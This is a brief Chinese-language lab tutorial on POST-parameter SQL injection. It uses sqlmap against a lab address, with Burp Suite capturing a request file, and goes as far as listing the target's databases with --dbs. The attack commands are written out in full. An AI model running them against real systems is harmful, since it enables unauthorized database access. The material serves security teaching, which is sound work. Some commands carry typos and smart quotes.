web安全实验-SQLmap工具POST注入实验

步骤1:了解POST类型注入

python sqlmap.py -u “http://172.16.12.2/loginAuth.php" –method POST –data “id=1&password=123456” -p id

–methon POST 指定提交方式为POST

–data 指定提交的数据

-p 指定SQL注入payload测试的参数

POST parameter ‘id’

POST 参数是可注入的

步骤2 从Burp Suite历史记录读取数据

配置浏览器和BUrpSuite网络代理

Proxy->Options

关闭BurpSuite工具拦截，使得经过它的http请求能顺利通过。

Proxy-> Intercept

点击Intercept is on使其状态为Intercept is off

Proxy-> HTTP history

Request

Raw

复制下面内容

c盘新建文件post.txt

python sqlmap.py -r c:/post.txt

Parameter： id

返回id是可注入的

获取目标机数据库列表 直接在原有命令基础加上–dbs

python sqlmap.py -r c:/post.txt –dbs

思考

POST型注入与GET型注入有何不同？